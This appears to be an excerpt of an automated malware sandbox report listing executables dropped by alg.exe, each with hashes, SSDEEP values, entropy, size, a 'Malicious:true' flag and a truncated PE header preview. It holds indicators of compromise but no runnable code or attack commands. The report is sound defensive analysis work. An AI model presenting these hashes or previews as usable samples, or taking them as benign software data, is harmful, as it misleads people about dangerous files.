                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................J..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                                                                                    Entropy (8bit):5.022669351704859
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:F8852DFC407C1DC619A7C8DAE83E3FFB
                                                                                                                                                                                                                                    SHA1:297718C28BF69027478C7CCBFC14F792B8962590
                                                                                                                                                                                                                                    SHA-256:4E117F66159F8FB5F408314791430EC005E56D96C6114A2A33FC5084FE03FA01
                                                                                                                                                                                                                                    SHA-512:F44553ACE345EF51C2B1FE70517FC35D5B6D23CFCEB8A75CD45FF61C26D4D291E04C86638EB233B35718F5486C5C0B45E7C53B4CCF0DDF3BFD830CBE4249C7B5
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1161728
                                                                                                                                                                                                                                    Entropy (8bit):5.047154946706352
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:T0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:2AA2B321F6C0EBC47546A58AD1C094EF
                                                                                                                                                                                                                                    SHA1:1DD8CD25807476F897A12D6C59B4BA89B2FE9555
                                                                                                                                                                                                                                    SHA-256:BB2E250A7D907368D0FB6DEBC0DDB4F10A6A15E8C96CF172B58D9B0154C99180
                                                                                                                                                                                                                                    SHA-512:624370401FE81169FB86C339597A5D20F658FCCF7DD4B66CE6E309B8EC23130429F4C13561E1B067A7F21B4524D525A36975858459B09BEFFD03F409D8A9EB0D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4151808
                                                                                                                                                                                                                                    Entropy (8bit):6.4997746839974
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:ptuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:pjEIa4HIEWOc53D527BWG
                                                                                                                                                                                                                                    MD5:01D0F49F8BA2FA0F5A620F28D777696A
                                                                                                                                                                                                                                    SHA1:B9765C299480AB4F1AE2CB2F68AAFC7A60FD1CCC
                                                                                                                                                                                                                                    SHA-256:4E79EFBC874DEB26557F718B36B42368F89715BDD1371A925EFA248E96E75DAC
                                                                                                                                                                                                                                    SHA-512:7D243E9285C5815A4E4076F5FD156CB80D38E6B9C51E6C90C0BD1A680B079D3CB34FB6893FE513DF704D17AC910F73BC9C620194A8DFD467987F3854470130B1
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....d.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):59941376
                                                                                                                                                                                                                                    Entropy (8bit):7.999367298596945
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1572864:tQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:mXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                    MD5:06489D827269451A21EBBBBF12DE6318
                                                                                                                                                                                                                                    SHA1:4FD426362F543B40634A6916C3B6F6C9ED5B1065
                                                                                                                                                                                                                                    SHA-256:BBCEBCBF9B941A74ADB36212808E4B61A3E70D6FF6684DD388E25537E9444C46
                                                                                                                                                                                                                                    SHA-512:DCD000F34EB1F2DEF05346134D44C522A2C576E25274FADCDEE6A7EA48D02894A8D5040E82630C19A9785B23D1A0C381DE4A4D9DE1C2E7E11FE66AC9BC27BC88
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......S..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1230336
                                                                                                                                                                                                                                    Entropy (8bit):5.185590752642087
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:MejVWYUA0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:djkY70sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:49AD39B3C60F0A352231D5D511DD0939
                                                                                                                                                                                                                                    SHA1:EDD3B93360E99D50F3352826F3C85025C72836DE
                                                                                                                                                                                                                                    SHA-256:B557000712C6BDDA8A1D522DAA24DEFD3BA4EA5581BE36A4ED74B8E3BDF6739A
                                                                                                                                                                                                                                    SHA-512:BB2D1E904FD62F6D57D798E11171D07E06D88F3C95285786D38EE47195D27DAFE9FE83D59EA2E0BF0CFBCB339E62F64C472F80388C363F00C2CE3C05D2DA6C57
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..................................L.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1384960
                                                                                                                                                                                                                                    Entropy (8bit):5.3778114519640665
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:rxwSJhkrmZsQsqjnhMgeiCl7G0nehbGZpbD:ry+krKsMDmg27RnWGj
                                                                                                                                                                                                                                    MD5:055DC4CCEAD9BCC25CA0F9DFDD1D4480
                                                                                                                                                                                                                                    SHA1:AA6992F2741111A47C88EB8671BFA07C1B10D3B7
                                                                                                                                                                                                                                    SHA-256:8ABE3ADEF177466DB5C23BFD97E771106D740D027FF0DC5C9A62FC0493AD1B06
                                                                                                                                                                                                                                    SHA-512:A6C6C1C4A1DD7E3A2C10ACA493EE6DC8FC468091C83B2FDAE0F8855AE40185C5AEC58408E234F65F8576DBF2B75DD41CB189327174EC56FB37DD039D2B1EB878
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................9D.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1649152
                                                                                                                                                                                                                                    Entropy (8bit):5.63273275575142
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:vHQJLIRgvsnNRsqjnhMgeiCl7G0nehbGZpbD:vHQJL34lDmg27RnWGj
                                                                                                                                                                                                                                    MD5:6A83F760517BD576D24CD71094379E4E
                                                                                                                                                                                                                                    SHA1:D1649D94334472ECECEB55A38580C20CFB69B428
                                                                                                                                                                                                                                    SHA-256:2DFD070275139E21BF5B9FACFA3C61A11CA5AE1412D50CD4369C0000CB15D1AB
                                                                                                                                                                                                                                    SHA-512:6148491C7224D9A6F981FFDD8E7AEC510EEAD4D4F49A21319AC1E5C88EE6194A28112CD5293721B59983A28B68A4775248C7EFEB2E2E47477DC77D1185D3F447
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@...................................._..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5365760
                                                                                                                                                                                                                                    Entropy (8bit):6.450971742398462
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:eUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kQ:hWmXL6DEC7dRpKuDQbgiD527BWG
                                                                                                                                                                                                                                    MD5:43F2AECB5943DAA3691867C7CC73B415
                                                                                                                                                                                                                                    SHA1:EE8749DA82124D2E931B9652435F3C43126CE8D6
                                                                                                                                                                                                                                    SHA-256:5389980F12DB561C4710132074AE4B644B25D007C114BD473F3CC4588D1E02A5
                                                                                                                                                                                                                                    SHA-512:FEB16BB4C20C8FFD4A4DC23E355440FFDDC709EF8E7D36477D97C7D53C71665D294F492AC4E05E2BABAF98D47001386734BA3D137AFAB8A192D1279939970402
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R......3R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3163136
                                                                                                                                                                                                                                    Entropy (8bit):7.972781382029088
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:prZ23AbsK6Ro022JjL2WEiVqJZRD527BWG:dJADmmxL2WEoCZRVQBWG
                                                                                                                                                                                                                                    MD5:9C8B185A46A07A5C3080AA519BFDB611
                                                                                                                                                                                                                                    SHA1:C68900AA3ED3A5350A1F33A537E7BFCFC469AABC
                                                                                                                                                                                                                                    SHA-256:E8C399D85E0828795CC53E03617FED563DD6AF7BB91CCB9E322A38A63F5DFCE8
                                                                                                                                                                                                                                    SHA-512:09D39266341B56DEB8CD1585677745C719DC6002B190724CEAE67E386DFB99E69BB279B31A4DD297F010EA9ADD9CB3127E35EF4B442C71C938859CB4A2DF95A7
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......#1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1213440
                                                                                                                                                                                                                                    Entropy (8bit):7.2049123190883115
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:TfrYY42wd7hlOw9fpkEE64AsqjnhMgeiCl7G0nehbGZpbD:Sz9xrS8Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:639356166764193D980935954AA874AB
                                                                                                                                                                                                                                    SHA1:D8AFBB614F154F225601AAE6F847E1360CE7F048
                                                                                                                                                                                                                                    SHA-256:6FA485A620E4EC81F275303965C6D72E3D89C6984CD2E1E1D2E66DDCDA899B93
                                                                                                                                                                                                                                    SHA-512:5F58CBFCE2DEC55B3AF8B516C142D87E99579EBDB775E192D271677FBC69568A654F44049CE425326D12B8624FB3D865F894399E3FC8178897FA1049B6D77D79
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1388544
                                                                                                                                                                                                                                    Entropy (8bit):5.2729212974525295
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:PwkNKiZ+R2GGNUbTF5zXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:PzNKUE5zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:AC8C484238D5C7F4EEE7C9D407A53026
                                                                                                                                                                                                                                    SHA1:8736E82DE158C9D403303684DC6D0EF55D9403FC
                                                                                                                                                                                                                                    SHA-256:3044534674EE47C30BCD10A94A84E07B89CE8EFA072F091CAB8BFE5619D219C4
                                                                                                                                                                                                                                    SHA-512:AB32C28A6F9397C26F1C37CE507DD406672D85F2D330F7F073E871644A896B15979627B55DE6066EC0B9A971E81FEFC8A6EAB1B905F03EC26647C1BC86F7CBA4
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P.......P.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5855744
                                                                                                                                                                                                                                    Entropy (8bit):6.574332552414844
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:98304:kALuzDKnxCp3JKNrPJzruaI6HMaJTtGb+D527BWG:3aGg3cFPIaI6HMaJTtGb+VQBWG
                                                                                                                                                                                                                                    MD5:C8432AEB57641B691499733F8B07B239
                                                                                                                                                                                                                                    SHA1:E4636893864CD7F220D0B6064D454BD0FC08D368
                                                                                                                                                                                                                                    SHA-256:2F2C66BA0E6E8846451904181806DE1BAF33D71E258AA2549F030A3483133D86
                                                                                                                                                                                                                                    SHA-512:C5E20742CAE8120EFB73D6F73A3D12672D2D263DFA3F04FD64E1A3AE1DA2A3B1D6496096078EBDC88CD580D0406CF35C5746B31196EB29CC1B03857031AE88B6
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1312768
                                                                                                                                                                                                                                    Entropy (8bit):5.3560624086643065
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:bXr/SVMxWcsqjnhMgeiCl7G0nehbGZpbD:v1xRDmg27RnWGj
                                                                                                                                                                                                                                    MD5:23484064ED64487D783EA316AD6F50C6
                                                                                                                                                                                                                                    SHA1:B471F3FE91D93A5AABA0A3731FF24315AFBD88FB
                                                                                                                                                                                                                                    SHA-256:5D68BED3724DDFD715DDF0E23A1776830FF598525B3247D9E86E907DEFD38266
                                                                                                                                                                                                                                    SHA-512:B7AF36099200B497B939758D0DDB44795BDC2859BD62BF00A209B7AF80B3EF27B7B676C02BBA3F97C2F4FA4534064CBF5B6872A49558465B15CA09F81D915923
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......!........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27533312
                                                                                                                                                                                                                                    Entropy (8bit):6.248635805472331
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:196608:xhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyVQBWG:xhRCpGpMJMrbp8JjpNdNlc5+B
                                                                                                                                                                                                                                    MD5:0DEEFC8BA5CEA00ABBEA78889A53655F
                                                                                                                                                                                                                                    SHA1:5461CC49FBD474A268BEBAD59FE8919507EDB1D0
                                                                                                                                                                                                                                    SHA-256:62FAC58EDB25E64AE55EB30ADB67BBBFA756387C5060DF6520D475B20D92D364
                                                                                                                                                                                                                                    SHA-512:0C9B30123B6E1897A6561BC895BE1BCB21FBC740E1863E0DA62BD7E16F75063B30EF43DE5DEBB0ABABCC05812FBB5133349133C058B3E232B07A3A82C9338DD4
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2199552
                                                                                                                                                                                                                                    Entropy (8bit):6.78899719599009
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:983pZ3kd0CuEeN0LUmRXzYs65mKDmg27RnWGj:dKuUQY151D527BWG
                                                                                                                                                                                                                                    MD5:61F2C2E3351FE09F66843E7108586471
                                                                                                                                                                                                                                    SHA1:38B6F2FE6E5F3630BAB80BDB2A7B42F62273F1FC
                                                                                                                                                                                                                                    SHA-256:7BE63F52976BDB3478B85C68162A21F9493C0B50193451261A7C8EDCA6DC1992
                                                                                                                                                                                                                                    SHA-512:B103AFB1950FAC9A1D18B336E5A43FB95322E1E619227E12055E16A2C498BAC2E6AAB1CA0BD4510E789D3C215F1C01B59F6E4889610C5E24976D5D424FFA9D00
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4971008
                                                                                                                                                                                                                                    Entropy (8bit):6.670833355869255
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:lErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mp:zA4oGlcR+glEdOPKzgVZoD527BWG
                                                                                                                                                                                                                                    MD5:86F545A8FA4673968EECFF91653F62FC
                                                                                                                                                                                                                                    SHA1:EF717CFEE4E32D12C6302E53262C2FF8DC3D216A
                                                                                                                                                                                                                                    SHA-256:6120EEC4BDAD419FA70009C8B6351A70053BF7A118CB21EC0046B80D951C17CB
                                                                                                                                                                                                                                    SHA-512:28DB643B4FDD868D7AD562F66D4C5E630245DE6D5ED9E8B95201E4BEF468DEAA3323472B40EECA9269FC08476A0F71504D95B50B913D6F9EA688A883E31D6331
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                    Entropy (8bit):6.829766344461206
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:t8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKe:Iv2gM+qwXLg7pPgw/DSZHaD527BWG
                                                                                                                                                                                                                                    MD5:ADD0D6A390899C81A749834A63D4723F
                                                                                                                                                                                                                                    SHA1:61237C7E736ED0132EB8FC16983768ABF7D1EF1D
                                                                                                                                                                                                                                    SHA-256:014F2A5C6919EA31025E0843C6610834B9D3F49A3F1AE71C8D28BC1B86BC4427
                                                                                                                                                                                                                                    SHA-512:E9E69C46BA2A825579AF71B2461CFE48E178E5C1D58A3B1D70B699ADAC10C2ED6BEC19030297B989AD0D65E2CEE3C1CD670A9E5E5E5E0AF857DE682C6EB7B2E3
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
